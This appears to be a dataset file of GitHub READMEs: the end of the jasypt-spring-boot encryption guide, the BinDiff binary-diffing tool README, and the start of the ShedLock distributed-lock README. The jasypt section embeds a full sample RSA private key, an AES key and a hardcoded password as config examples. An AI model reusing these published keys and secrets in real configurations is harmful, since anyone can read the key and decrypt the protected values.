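openssl genrsa -out private_key.pem 2048
openssl pkcs8 -topk8 -inform PEM -outform DER -in private_key.pem -nocrypt -out private_key.der
openssl rsa -in private_key.pem -pubout -out public_key.pem
# Base64-encode the DER bytes (GNU coreutils base64) for jasypt.encryptor.privateKeyString
base64 -w0 private_key.der > private_key.b64
```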
### Sample config
#### DER key as string
```yaml
jasypt:
encryptor:
privateKeyString: MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCtB/IYK8E52CYMZTpyIY9U0HqMewyKnRvSo6s+9VNIn/HSh9+MoBGiADa2MaPKvetS3CD3CgwGq/+LIQ1HQYGchRrSORizOcIp7KBx+Wc1riatV/tcpcuFLC1j6QJ7d2I+T7RA98Sx8X39orqlYFQVysTw/aTawX/yajx0UlTW3rNAY+ykeQ0CBHowtTxKM9nGcxLoQbvbYx1iG9JgAqye7TYejOpviOH+BpD8To2S8zcOSojIhixEfayay0gURv0IKJN2LP86wkpAuAbL+mohUq1qLeWdTEBrIRXjlnrWs1M66w0l/6JwaFnGOqEB6haMzE4JWZULYYpr2yKyoGCRAgMBAAECggEAQxURhs1v3D0wgx27ywO3zeoFmPEbq6G9Z6yMd5wk7cMUvcpvoNVuAKCUlY4pMjDvSvCM1znN78g/CnGF9FoxJb106Iu6R8HcxOQ4T/ehS+54kDvL999PSBIYhuOPUs62B/Jer9FfMJ2veuXb9sGh19EFCWlMwILEV/dX+MDyo1qQaNzbzyyyaXP8XDBRDsvPL6fPxL4r6YHywfcPdBfTc71/cEPksG8ts6um8uAVYbLIDYcsWopjVZY/nUwsz49xBCyRcyPnlEUJedyF8HANfVEO2zlSyRshn/F+rrjD6aKBV/yVWfTEyTSxZrBPl4I4Tv89EG5CwuuGaSagxfQpAQKBgQDXEe7FqXSaGk9xzuPazXy8okCX5pT6545EmqTP7/JtkMSBHh/xw8GPp+JfrEJEAJJl/ISbdsOAbU+9KAXuPmkicFKbodBtBa46wprGBQ8XkR4JQoBFj1SJf7Gj9ozmDycozO2Oy8a1QXKhHUPkbPQ0+w3efwoYdfE67ZodpFNhswKBgQDN9eaYrEL7YyD7951WiK0joq0BVBLK3rwO5+4g9IEEQjhP8jSo1DP+zS495t5ruuuuPsIeodA79jI8Ty+lpYqqCGJTE6muqLMJDiy7KlMpe0NZjXrdSh6edywSz3YMX1eAP5U31pLk0itMDTf2idGcZfrtxTLrpRffumowdJ5qqwKBgF+XZ+JRHDN2aEM0atAQr1WEZGNfqG4Qx4o0lfaaNs1+H+knw5kIohrAyvwtK1LgUjGkWChlVCXb8CoqBODMupwFAqKL/IDImpUhc/t5uiiGZqxE85B3UWK/7+vppNyIdaZL13a1mf9sNI/p2whHaQ+3WoW/P3R5z5uaifqM1EbDAoGAN584JnUnJcLwrnuBx1PkBmKxfFFbPeSHPzNNsSK3ERJdKOINbKbaX+7DlT4bRVbWvVj/jcw/c2Ia0QTFpmOdnivjefIuehffOgvU8rsMeIBsgOvfiZGx0TP3+CCFDfRVqjIBt3HAfAFyZfiP64nuzOERslL2XINafjZW5T0pZz8CgYAJ3UbEMbKdvIuK+uTl54R1Vt6FO9T5bgtHR4luPKoBv1ttvSC6BlalgxA0Ts/AQ9tCsUK2JxisUcVgMjxBVvG0lfq/EHpL0Wmn59SHvNwtHU2qx3Ne6M0nQtneCCfR78OcnqQ7+L+3YCMqYGJHNFSard+dewfKoPnWw0WyGFEWCg==
```
#### DER key as a resource location
```yaml
jasypt:
encryptor:
privateKeyLocation: classpath:private_key.der
```
#### PEM key as string
```yaml
jasypt:
encryptor:
privateKeyFormat: PEM
privateKeyString: |-
-----BEGIN PRIVATE KEY-----
MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCtB/IYK8E52CYM
ZTpyIY9U0HqMewyKnRvSo6s+9VNIn/HSh9+MoBGiADa2MaPKvetS3CD3CgwGq/+L
IQ1HQYGchRrSORizOcIp7KBx+Wc1riatV/tcpcuFLC1j6QJ7d2I+T7RA98Sx8X39
orqlYFQVysTw/aTawX/yajx0UlTW3rNAY+ykeQ0CBHowtTxKM9nGcxLoQbvbYx1i
G9JgAqye7TYejOpviOH+BpD8To2S8zcOSojIhixEfayay0gURv0IKJN2LP86wkpA
uAbL+mohUq1qLeWdTEBrIRXjlnrWs1M66w0l/6JwaFnGOqEB6haMzE4JWZULYYpr
2yKyoGCRAgMBAAECggEAQxURhs1v3D0wgx27ywO3zeoFmPEbq6G9Z6yMd5wk7cMU
vcpvoNVuAKCUlY4pMjDvSvCM1znN78g/CnGF9FoxJb106Iu6R8HcxOQ4T/ehS+54
kDvL999PSBIYhuOPUs62B/Jer9FfMJ2veuXb9sGh19EFCWlMwILEV/dX+MDyo1qQ
aNzbzyyyaXP8XDBRDsvPL6fPxL4r6YHywfcPdBfTc71/cEPksG8ts6um8uAVYbLI
DYcsWopjVZY/nUwsz49xBCyRcyPnlEUJedyF8HANfVEO2zlSyRshn/F+rrjD6aKB
V/yVWfTEyTSxZrBPl4I4Tv89EG5CwuuGaSagxfQpAQKBgQDXEe7FqXSaGk9xzuPa
zXy8okCX5pT6545EmqTP7/JtkMSBHh/xw8GPp+JfrEJEAJJl/ISbdsOAbU+9KAXu
PmkicFKbodBtBa46wprGBQ8XkR4JQoBFj1SJf7Gj9ozmDycozO2Oy8a1QXKhHUPk
bPQ0+w3efwoYdfE67ZodpFNhswKBgQDN9eaYrEL7YyD7951WiK0joq0BVBLK3rwO
5+4g9IEEQjhP8jSo1DP+zS495t5ruuuuPsIeodA79jI8Ty+lpYqqCGJTE6muqLMJ
Diy7KlMpe0NZjXrdSh6edywSz3YMX1eAP5U31pLk0itMDTf2idGcZfrtxTLrpRff
umowdJ5qqwKBgF+XZ+JRHDN2aEM0atAQr1WEZGNfqG4Qx4o0lfaaNs1+H+knw5kI
ohrAyvwtK1LgUjGkWChlVCXb8CoqBODMupwFAqKL/IDImpUhc/t5uiiGZqxE85B3
UWK/7+vppNyIdaZL13a1mf9sNI/p2whHaQ+3WoW/P3R5z5uaifqM1EbDAoGAN584
JnUnJcLwrnuBx1PkBmKxfFFbPeSHPzNNsSK3ERJdKOINbKbaX+7DlT4bRVbWvVj/
jcw/c2Ia0QTFpmOdnivjefIuehffOgvU8rsMeIBsgOvfiZGx0TP3+CCFDfRVqjIB
t3HAfAFyZfiP64nuzOERslL2XINafjZW5T0pZz8CgYAJ3UbEMbKdvIuK+uTl54R1
Vt6FO9T5bgtHR4luPKoBv1ttvSC6BlalgxA0Ts/AQ9tCsUK2JxisUcVgMjxBVvG0
lfq/EHpL0Wmn59SHvNwtHU2qx3Ne6M0nQtneCCfR78OcnqQ7+L+3YCMqYGJHNFSa
rd+dewfKoPnWw0WyGFEWCg==
-----END PRIVATE KEY-----
```
#### PEM key as a resource location
```yaml
jasypt:
encryptor:
privateKeyFormat: PEM
privateKeyLocation: classpath:private_key.pem
```
### Encrypting properties
There is no program/command to encrypt properties using asymmetric keys but you can use the following code snippet to encrypt
your properties:
#### DER Format
```java
import com.ulisesbocchio.jasyptspringboot.encryptor.SimpleAsymmetricConfig;
import com.ulisesbocchio.jasyptspringboot.encryptor.SimpleAsymmetricStringEncryptor;
import org.jasypt.encryption.StringEncryptor;
public class PropertyEncryptor {
public static void main(String[] args) {
SimpleAsymmetricConfig config = new SimpleAsymmetricConfig();
config.setPublicKey(""MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArQfyGCvBOdgmDGU6ciGPVNB6jHsMip0b0qOrPvVTSJ/x0offjKARogA2tjGjyr3rUtwg9woMBqv/iyENR0GBnIUa0jkYsznCKeygcflnNa4mrVf7XKXLhSwtY+kCe3diPk+0QPfEsfF9/aK6pWBUFcrE8P2k2sF/8mo8dFJU1t6zQGPspHkNAgR6MLU8SjPZxnMS6EG722MdYhvSYAKsnu02Hozqb4jh/gaQ/E6NkvM3DkqIyIYsRH2smstIFEb9CCiTdiz/OsJKQLgGy/pqIVKtai3lnUxAayEV45Z61rNTOusNJf+icGhZxjqhAeoWjMxOCVmVC2GKa9sisqBgkQIDAQAB"");
StringEncryptor encryptor = new SimpleAsymmetricStringEncryptor(config);
String message = ""chupacabras"";
String encrypted = encryptor.encrypt(message);
System.out.printf(""Encrypted message %s\n"", encrypted);
}
}
```
#### PEM Format
```java
import com.ulisesbocchio.jasyptspringboot.encryptor.SimpleAsymmetricConfig;
import com.ulisesbocchio.jasyptspringboot.encryptor.SimpleAsymmetricStringEncryptor;
import org.jasypt.encryption.StringEncryptor;
import static com.ulisesbocchio.jasyptspringboot.util.AsymmetricCryptography.KeyFormat.PEM;
public class PropertyEncryptor {
public static void main(String[] args) {
SimpleAsymmetricConfig config = new SimpleAsymmetricConfig();
config.setKeyFormat(PEM);
config.setPublicKey(""-----BEGIN PUBLIC KEY-----\n"" +
""MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArQfyGCvBOdgmDGU6ciGP\n"" +
""VNB6jHsMip0b0qOrPvVTSJ/x0offjKARogA2tjGjyr3rUtwg9woMBqv/iyENR0GB\n"" +
""nIUa0jkYsznCKeygcflnNa4mrVf7XKXLhSwtY+kCe3diPk+0QPfEsfF9/aK6pWBU\n"" +
""FcrE8P2k2sF/8mo8dFJU1t6zQGPspHkNAgR6MLU8SjPZxnMS6EG722MdYhvSYAKs\n"" +
""nu02Hozqb4jh/gaQ/E6NkvM3DkqIyIYsRH2smstIFEb9CCiTdiz/OsJKQLgGy/pq\n"" +
""IVKtai3lnUxAayEV45Z61rNTOusNJf+icGhZxjqhAeoWjMxOCVmVC2GKa9sisqBg\n"" +
""kQIDAQAB\n"" +
""-----END PUBLIC KEY-----\n"");
StringEncryptor encryptor = new SimpleAsymmetricStringEncryptor(config);
String message = ""chupacabras"";
String encrypted = encryptor.encrypt(message);
System.out.printf(""Encrypted message %s\n"", encrypted);
}
}
```
## AES 256-GCM Encryption
As of version 3.0.5, AES 256-GCM Encryption is supported. To use this type of encryption, set the property `jasypt.encryptor.gcm-secret-key-string`, `jasypt.encryptor.gcm-secret-key-location` or `jasypt.encryptor.gcm-secret-key-password`.
The underlying algorithm used is `AES/GCM/NoPadding` so make sure that's installed in your JDK.
The `SimpleGCMByteEncryptor` uses a `IVGenerator` to encrypt properties. You can configure that with property `jasypt.encryptor.iv-generator-classname` if you don't want to
use the default implementation `RandomIvGenerator`
### Using a key
When using a key via `jasypt.encryptor.gcm-secret-key-string` or `jasypt.encryptor.gcm-secret-key-location`, make sure you encode your key in base64. The base64 string value can be set in `jasypt.encryptor.gcm-secret-key-string`, or you can save it in a file and point the property `jasypt.encryptor.gcm-secret-key-location` at that file with a Spring resource locator. For instance:
```properties
jasypt.encryptor.gcm-secret-key-string=""PNG5egJcwiBrd+E8go1tb9PdPvuRSmLSV3jjXBmWlIU=""
#OR
jasypt.encryptor.gcm-secret-key-location=classpath:secret_key.b64
#OR
jasypt.encryptor.gcm-secret-key-location=file:/full/path/secret_key.b64
#OR
jasypt.encryptor.gcm-secret-key-location=file:relative/path/secret_key.b64
```
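If you do not already have a key, a random 256-bit key in base64 form can be generated with, for example, OpenSSL (an illustrative command, not from the original README):
```bash
# 32 random bytes = a 256-bit AES key, emitted as base64
openssl rand -base64 32 > secret_key.b64
```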
Optionally, you can create your own `StringEncryptor` bean:
```java
@Bean(""encryptorBean"")
public StringEncryptor stringEncryptor() {
SimpleGCMConfig config = new SimpleGCMConfig();
config.setSecretKey(""PNG5egJcwiBrd+E8go1tb9PdPvuRSmLSV3jjXBmWlIU="");
return new SimpleGCMStringEncryptor(config);
}
```
### Using a password
Alternatively, you can use a password to encrypt/decrypt properties using AES 256-GCM. The password is used to generate a key on startup, so there are a few properties you need to (or can) set. These are:
```properties
jasypt.encryptor.gcm-secret-key-password=""chupacabras""
#Optional, defaults to ""1000""
jasypt.encryptor.key-obtention-iterations=""1000""
#Optional, defaults to 0 (no salt). If provided, specify the salt string in base64 format
jasypt.encryptor.gcm-secret-key-salt=""HrqoFr44GtkAhhYN+jP8Ag==""
#Optional, defaults to PBKDF2WithHmacSHA256
jasypt.encryptor.gcm-secret-key-algorithm=""PBKDF2WithHmacSHA256""
```
Make sure these parameters are the same if you're encrypting your secrets with external tools.
Optionally, you can create your own `StringEncryptor` bean:
```java
@Bean(""encryptorBean"")
public StringEncryptor stringEncryptor() {
SimpleGCMConfig config = new SimpleGCMConfig();
config.setSecretKeyPassword(""chupacabras"");
config.setSecretKeyIterations(1000);
config.setSecretKeySalt(""HrqoFr44GtkAhhYN+jP8Ag=="");
config.setSecretKeyAlgorithm(""PBKDF2WithHmacSHA256"");
return new SimpleGCMStringEncryptor(config);
}
```
### Encrypting properties with AES GCM-256
You can use the [Maven Plugin](#maven-plugin) or follow a similar strategy as explained in [Asymmetric Encryption](#asymmetric-encryption)'s [Encrypting Properties](#encrypting-properties)
## Demo App
The [jasypt-spring-boot-demo-samples](https://github.com/ulisesbocchio/jasypt-spring-boot-samples) repo contains working Spring Boot app examples.
The main [jasypt-spring-boot-demo](https://github.com/ulisesbocchio/jasypt-spring-boot-samples/tree/master/jasypt-spring-boot-demo) Demo app explicitly sets a System property with the encryption password before the app runs.
To have a little more realistic scenario try removing the line where the system property is set, build the app with maven, and the run:
```
java -jar target/jasypt-spring-boot-demo-0.0.1-SNAPSHOT.jar --jasypt.encryptor.password=password
```
This passes the encryption password as a command-line argument. Alternatively, run it like this:
```
java -Djasypt.encryptor.password=password -jar target/jasypt-spring-boot-demo-0.0.1-SNAPSHOT.jar
```
This passes the encryption password as a System property.
If you need to pass this property as an Environment Variable you can accomplish this by creating application.properties or application.yml and adding:
```
jasypt.encryptor.password=${JASYPT_ENCRYPTOR_PASSWORD:}
```
or in YAML
```
jasypt:
encryptor:
password: ${JASYPT_ENCRYPTOR_PASSWORD:}
```
What this does is define the `jasypt.encryptor.password` property so that it points to a different property, `JASYPT_ENCRYPTOR_PASSWORD`, which you can set with an environment variable (and can still override via System properties). This technique can also be used to translate property names/values for any other library you need.
This is also available in the Demo app. So you can run the Demo app like this:
```
JASYPT_ENCRYPTOR_PASSWORD=password java -jar target/jasypt-spring-boot-demo-1.5-SNAPSHOT.jar
```
**Note:** When using Gradle as the build tool, the processResources task fails because of the '$' character; to solve this you just need to escape the variable like this: '\\$'.
## Other Demo Apps
While [jasypt-spring-boot-demo](https://github.com/ulisesbocchio/jasypt-spring-boot-samples/tree/master/jasypt-spring-boot-demo) is a comprehensive Demo that showcases all possible ways to encrypt/decrypt properties, there are other multiple Demos that demo isolated scenarios.
[//]: # (## Flattr)
[//]: # ([![Flattr this git repo](http://api.flattr.com/button/flattr-badge-large.png)](https://flattr.com/@ubocchio/github/ulisesbocchio))
"
google/bindiff,main,1872,101,2023-09-20T06:41:55Z,323705,29,Quickly find differences and similarities in disassembled code,bindiff binexport c-plus-plus diffing ida-plugin ida-pro java program-analysis program-differencing reverse-engineering vxsig,"![BinDiff Logo](docs/images/bindiff-lockup-vertical.png)
Copyright 2011-2024 Google LLC.
# BinDiff
This repository contains the BinDiff source code. BinDiff is an open-source
comparison tool for binary files to quickly find differences and similarities
in disassembled code.
## Table of Contents
- [About BinDiff](#about-bindiff)
- [Quickstart](#quickstart)
- [Documentation](#documentation)
- [Codemap](#codemap)
- [Building from Source](#building-from-source)
- [License](#license)
- [Getting Involved](#getting-involved)
## About BinDiff
BinDiff is an open-source comparison tool for binary files that assists
vulnerability researchers and engineers in quickly finding differences and
similarities in disassembled code.
With BinDiff, researchers can identify and isolate fixes for vulnerabilities in
vendor-supplied patches. It can also be used to port symbols and comments
between disassemblies of multiple versions of the same binary. This makes
tracking changes over time easier, allows organizations to retain analysis
results, and enables knowledge transfer among binary analysts.
### Use Cases
* Compare binary files for x86, MIPS, ARM, PowerPC, and other architectures
supported by popular [disassemblers](docs/disassemblers.md).
* Identify identical and similar functions in different binaries
* Port function names, comments and local names from one disassembly to the
other
* Detect and highlight changes between two variants of the same function
## Quickstart
If you want to just get started using BinDiff, download prebuilt installation
packages from the
[releases page](https://github.com/google/bindiff/releases).
Note: BinDiff relies on a separate disassembler. Out of the box, it ships with
support for IDA Pro, Binary Ninja and Ghidra. The [disassemblers page](docs/disassemblers.md) lists the supported configurations.
## Documentation
A subset of the existing [manual](https://www.zynamics.com/bindiff/manual) is
available in the [`docs/` directory](docs/README.md).
## Codemap
BinDiff contains the following components:
* [`cmake`](cmake) - CMake build files declaring external dependencies
* [`fixtures`](fixtures) - A collection of test files to exercise the BinDiff
core engine
* [`ida`](ida) - Integration with the IDA Pro disassembler
* [`java`](java) - Java source code. This contains the BinDiff visual diff
user interface and its corresponding utility library.
* [`match`](match) - Matching algorithms for the BinDiff core engine
* [`packaging`](packaging) - Package sources for the installation packages
* [`tools`](tools) - Helper executables that are shipped with the product
## Building from Source
The instructions below should be enough to build both the native code and the
Java based components.
More detailed build instructions will be added at a later date. This includes
ready-made `Dockerfile`s and scripts for building the installation packages.
### Native code
BinDiff uses CMake to generate its build files for those components that consist
of native C++ code.
The following build dependencies are required:
* [BinExport](https://github.com/google/binexport) 12, the companion plugin
to BinDiff that also contains a lot of shared code
* Boost 1.71.0 or higher (a partial copy of 1.71.0 ships with BinExport and
will be used automatically)
* [CMake](https://cmake.org/download/) 3.14 or higher
* [Ninja](https://ninja-build.org/) for speedy builds
* GCC 9 or a recent version of Clang on Linux/macOS. On Windows, use the
Visual Studio 2019 compiler and the Windows SDK for Windows 10.
* Git 1.8 or higher
* Dependencies that will be downloaded:
* Abseil, GoogleTest, Protocol Buffers (3.14), and SQLite3
* Binary Ninja SDK
The following build dependencies are optional:
* IDA Pro only: IDA SDK 8.0 or higher (unpack into `deps/idasdk`)
The general build steps are the same on Windows, Linux and macOS. The following
shows the commands for Linux.
Download dependencies that won't be downloaded automatically:
```bash
mkdir -p build/out
git clone https://github.com/google/binexport build/binexport
unzip -q -d build/idasdk
```
Next, configure the build directory and generate build files:
```bash
cmake -S . -B build/out -G Ninja \
-DCMAKE_BUILD_TYPE=Release \
-DCMAKE_INSTALL_PREFIX=build/out \
-DBINDIFF_BINEXPORT_DIR=build/binexport \
""-DIdaSdk_ROOT_DIR=${PWD}build/idasdk""
```
Finally, invoke the actual build. Binaries will be placed in
`build/out/bindiff-prefix`:
```bash
cmake --build build/out --config Release
(cd build/out; ctest --build-config Release --output-on-failure)
cmake --install build/out --config Release
```
### Building without IDA
To build without IDA, simply change the above configuration step to
```bash
cmake -S . -B build/out -G Ninja \
-DCMAKE_BUILD_TYPE=Release \
-DCMAKE_INSTALL_PREFIX=build/out \
-DBINDIFF_BINEXPORT_DIR=build/binexport \
-DBINEXPORT_ENABLE_IDAPRO=OFF
```
### Java GUI and yFiles
Building the Java based GUI requires the commercial third-party graph
visualisation library [yFiles](https://www.yworks.com/products/yfiles) for graph
display and layout. This library is immensely powerful, and not easily
replaceable.
To build, BinDiff uses Gradle 6.x and Java 11 LTS. Refer to its
[installation guide](https://docs.gradle.org/6.8.3/userguide/installation.html)
for instructions on how to install.
Assuming you are a yFiles license holder, set the `YFILES_DIR` environment
variable to a directory containing the yFiles `y.jar` and `ysvg.jar`.
Note: BinDiff still uses the older 2.x branch of yFiles.
Then invoke Gradle to download external dependencies and build:
Windows:
```
set YFILES_DIR=
cd java
gradle shadowJar
```
Linux or macOS:
```
export YFILES_DIR=
cd java
gradle shadowJar
```
Afterwards the directory `ui/build/libs` in the `java` sub-directory should
contain the self-contained `bindiff-ui-all.jar` artifact, which can be run
using the standard `java -jar` command.
## Further reading / Similar tools
The original papers outlining the general ideas behind BinDiff:
* Thomas Dullien and Rolf Rolles. *Graph-Based Comparison of Executable
Objects*. [bindiffsstic05-1.pdf](docs/papers/bindiffsstic05-1.pdf).
SSTIC ’05, Symposium sur la Sécurité des Technologies de l’Information et des
Communications. 2005.
* Halvar Flake. *Structural Comparison of Executable Objects*.
[dimva_paper2.pdf](docs/papers/dimva_paper2.pdf). pp 161-173. Detection of
Intrusions and Malware & Vulnerability Assessment. 2004.3-88579-375-X.
Other tools in the same problem space:
* [Diaphora](https://github.com/joxeankoret/diaphora), an advanced program
diffing tool implementing many of the same ideas.
* [TurboDiff](https://www.coresecurity.com/core-labs/open-source-tools/turbodiff-cs), a now-defunct program diffing plugin for IDA Pro.
Projects using BinDiff:
* [VxSig](https://github.com/google/vxsig), a tool to automatically generate
AV byte signatures from sets of similar binaries.
## License
BinDiff is licensed under the terms of the Apache license. See
[LICENSE](LICENSE) for more information.
## Getting Involved
If you want to contribute, please read [CONTRIBUTING.md](CONTRIBUTING.md)
before sending pull requests. You can also report bugs or file feature
requests.
"
lukas-krecan/ShedLock,master,3371,491,2016-12-11T13:53:59Z,6387,19,Distributed lock for your scheduled tasks,,"ShedLock
========
[![Apache License 2](https://img.shields.io/badge/license-ASF2-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0.txt) [![Build Status](https://github.com/lukas-krecan/ShedLock/workflows/CI/badge.svg)](https://github.com/lukas-krecan/ShedLock/actions) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/net.javacrumbs.shedlock/shedlock-parent/badge.svg)](https://maven-badges.herokuapp.com/maven-central/net.javacrumbs.shedlock/shedlock-parent)
ShedLock makes sure that your scheduled tasks are executed at most once at the same time.
If a task is being executed on one node, it acquires a lock which prevents execution of the same task from another node (or thread).
Please note, that **if one task is already being executed on one node, execution on other nodes does not wait, it is simply skipped**.
ShedLock uses an external store like Mongo, JDBC database, Redis, Hazelcast, ZooKeeper or others for coordination.
Feedback and pull-requests welcome!
#### ShedLock is not a distributed scheduler
Please note that ShedLock is not and will never be a full-fledged scheduler, it's just a lock. If you need a distributed
scheduler, please use another project ([db-scheduler](https://github.com/kagkarlsson/db-scheduler), [JobRunr](https://www.jobrunr.io/en/)).
ShedLock is designed to be used in situations where you have scheduled tasks that are not ready to be executed in parallel, but can be safely
executed repeatedly. Moreover, the locks are time-based and ShedLock assumes that clocks on the nodes are synchronized.
+ [Versions](#versions)
+ [Components](#components)
+ [Usage](#usage)
+ [Lock Providers](#configure-lockprovider)
- [JdbcTemplate](#jdbctemplate)
- [R2DBC](#r2dbc)
- [jOOQ](#jooq-lock-provider)
- [Micronaut Data Jdbc](#micronaut-data-jdbc)
- [Mongo](#mongo)
- [DynamoDB](#dynamodb)
- [DynamoDB 2](#dynamodb-2)
- [ZooKeeper (using Curator)](#zookeeper-using-curator)
- [Redis (using Spring RedisConnectionFactory)](#redis-using-spring-redisconnectionfactory)
- [Redis (using Spring ReactiveRedisConnectionFactory)](#redis-using-spring-reactiveredisconnectionfactory)
- [Redis (using Jedis)](#redis-using-jedis)
- [Hazelcast](#hazelcast)
- [Couchbase](#couchbase)
- [ElasticSearch](#elasticsearch)
- [OpenSearch](#opensearch)
- [CosmosDB](#cosmosdb)
- [Cassandra](#cassandra)
- [Consul](#consul)
- [ArangoDB](#arangodb)
- [Neo4j](#neo4j)
- [Etcd](#etcd)
- [Apache Ignite](#apache-ignite)
- [In-Memory](#in-memory)
- [Memcached](#memcached-using-spymemcached)
- [Datastore](#datastore)
+ [Multi-tenancy](#multi-tenancy)
+ [Customization](#customization)
+ [Duration specification](#duration-specification)
+ [Extending the lock](#extending-the-lock)
+ [Micronaut integration](#micronaut-integration)
+ [CDI integration](#cdi-integration)
+ [Locking without a framework](#locking-without-a-framework)
+ [Troubleshooting](#troubleshooting)
+ [Modes of Spring integration](#modes-of-spring-integration)
- [Scheduled method proxy](#scheduled-method-proxy)
- [TaskScheduler proxy](#taskscheduler-proxy)
+ [Release notes](#release-notes)
## Versions
If you are using JDK 17 or newer and up-to-date libraries like Spring 6, use version **5.1.0** ([Release Notes](#500-2022-12-10)). If you
are on an older JDK or libraries, use version **4.44.0** ([documentation](https://github.com/lukas-krecan/ShedLock/tree/version4)).
## Components
ShedLock consists of three parts
* Core - The locking mechanism
* Integration - integration with your application, using Spring AOP, Micronaut AOP or manual code
* Lock provider - provides the lock using an external process like SQL database, Mongo, Redis and others
## Usage
To use ShedLock, you do the following
1) Enable and configure Scheduled locking
2) Annotate your scheduled tasks
3) Configure a Lock Provider
### Enable and configure Scheduled locking (Spring)
First of all, we have to import the project
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-spring</artifactId>
    <version>5.13.0</version>
</dependency>
```
Now we need to integrate the library with Spring. In order to enable schedule locking use `@EnableSchedulerLock` annotation
```java
@Configuration
@EnableScheduling
@EnableSchedulerLock(defaultLockAtMostFor = ""10m"")
class MySpringConfiguration {
...
}
```
### Annotate your scheduled tasks
```java
import net.javacrumbs.shedlock.spring.annotation.SchedulerLock;
...
@Scheduled(...)
@SchedulerLock(name = ""scheduledTaskName"")
public void scheduledTask() {
// To assert that the lock is held (prevents misconfiguration errors)
LockAssert.assertLocked();
// do something
}
```
The `@SchedulerLock` annotation has several purposes. First of all, only annotated methods are locked, the library ignores
all other scheduled tasks. You also have to specify the name for the lock. Only one task with the same name can be executed
at the same time.
You can also set `lockAtMostFor` attribute which specifies how long the lock should be kept in case the
executing node dies. This is just a fallback; under normal circumstances the lock is released as soon as the task finishes
(unless `lockAtLeastFor` is specified, see below)
**You have to set `lockAtMostFor` to a value which is much longer than normal execution time.** If the task takes longer than
`lockAtMostFor` the resulting behavior may be unpredictable (more than one process will effectively hold the lock).
If you do not specify `lockAtMostFor` in `@SchedulerLock`, the default value from `@EnableSchedulerLock` will be used.
Lastly, you can set `lockAtLeastFor` attribute which specifies minimum amount of time for which the lock should be kept.
Its main purpose is to prevent execution from multiple nodes in case of really short tasks and clock difference between the nodes.
All the annotations support Spring Expression Language (SpEL).
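For instance, the lock name can reference a method parameter (an illustrative sketch; `batchId` is a hypothetical parameter and this requires a ShedLock version with SpEL support in the `name` attribute):
```java
@SchedulerLock(name = ""processBatch-#{#batchId}"", lockAtMostFor = ""30m"")
public void processBatch(String batchId) {
    // each batchId value gets its own lock name
}
```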
#### Example
Let's say you have a task which you execute every 15 minutes and which usually takes a few minutes to run.
Moreover, you want to execute it at most once per 15 minutes. In that case, you can configure it like this:
```java
import net.javacrumbs.shedlock.core.SchedulerLock;
@Scheduled(cron = ""0 */15 * * * *"")
@SchedulerLock(name = ""scheduledTaskName"", lockAtMostFor = ""14m"", lockAtLeastFor = ""14m"")
public void scheduledTask() {
// do something
}
```
By setting `lockAtMostFor` we make sure that the lock is released even if the node dies. By setting `lockAtLeastFor`
we make sure it's not executed more than once in fifteen minutes.
Please note that **`lockAtMostFor` is just a safety net in case that the node executing the task dies, so set it to
a time that is significantly larger than maximum estimated execution time.** If the task takes longer than `lockAtMostFor`,
it may be executed again and the results will be unpredictable (more processes will hold the lock).
### Configure LockProvider
There are several implementations of LockProvider.
#### JdbcTemplate
First, create lock table (**please note that `name` has to be primary key**)
```sql
# MySQL, MariaDB
CREATE TABLE shedlock(name VARCHAR(64) NOT NULL, lock_until TIMESTAMP(3) NOT NULL,
locked_at TIMESTAMP(3) NOT NULL DEFAULT CURRENT_TIMESTAMP(3), locked_by VARCHAR(255) NOT NULL, PRIMARY KEY (name));
# Postgres
CREATE TABLE shedlock(name VARCHAR(64) NOT NULL, lock_until TIMESTAMP NOT NULL,
locked_at TIMESTAMP NOT NULL, locked_by VARCHAR(255) NOT NULL, PRIMARY KEY (name));
# Oracle
CREATE TABLE shedlock(name VARCHAR(64) NOT NULL, lock_until TIMESTAMP(3) NOT NULL,
locked_at TIMESTAMP(3) NOT NULL, locked_by VARCHAR(255) NOT NULL, PRIMARY KEY (name));
# MS SQL
CREATE TABLE shedlock(name VARCHAR(64) NOT NULL, lock_until datetime2 NOT NULL,
locked_at datetime2 NOT NULL, locked_by VARCHAR(255) NOT NULL, PRIMARY KEY (name));
# DB2
CREATE TABLE shedlock(name VARCHAR(64) NOT NULL PRIMARY KEY, lock_until TIMESTAMP NOT NULL,
locked_at TIMESTAMP NOT NULL, locked_by VARCHAR(255) NOT NULL);
```
Or use [this](micronaut/test/micronaut-jdbc/src/main/resources/db/liquibase-changelog.xml) liquibase change-set.
Add dependency
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-jdbc-template</artifactId>
    <version>5.13.0</version>
</dependency>
```
Configure:
```java
import net.javacrumbs.shedlock.provider.jdbctemplate.JdbcTemplateLockProvider;
...
@Bean
public LockProvider lockProvider(DataSource dataSource) {
return new JdbcTemplateLockProvider(
JdbcTemplateLockProvider.Configuration.builder()
.withJdbcTemplate(new JdbcTemplate(dataSource))
.usingDbTime() // Works on Postgres, MySQL, MariaDb, MS SQL, Oracle, DB2, HSQL and H2
.build()
);
}
```
By specifying `usingDbTime()` the lock provider will use UTC time based on the DB server clock.
If you do not specify this option, clock from the app server will be used (the clocks on app servers may not be
synchronized thus leading to various locking issues).
It's strongly recommended to use `usingDbTime()` option as it uses DB engine specific SQL that prevents INSERT conflicts.
See more details [here](https://stackoverflow.com/a/76774461/277042).
For more fine-grained configuration use other options of the `Configuration` object
```java
new JdbcTemplateLockProvider(builder()
.withTableName(""shdlck"")
.withColumnNames(new ColumnNames(""n"", ""lck_untl"", ""lckd_at"", ""lckd_by""))
.withJdbcTemplate(new JdbcTemplate(getDatasource()))
.withLockedByValue(""my-value"")
.withDbUpperCase(true)
.build())
```
If you need to specify a schema, you can set it in the table name using the usual dot notation
`new JdbcTemplateLockProvider(datasource, ""my_schema.shedlock"")`
To use a database with case-sensitive table and column names, the `.withDbUpperCase(true)` flag can be used.
Default is `false` (lowercase).
#### Warning
**Do not manually delete lock row from the DB table.** ShedLock has an in-memory cache of existing lock rows
so the row will NOT be automatically recreated until application restart. If you need to, you can edit the row/document, risking only
that multiple locks will be held.
#### R2DBC
If you are really brave, you can try experimental R2DBC support. Please keep in mind that the
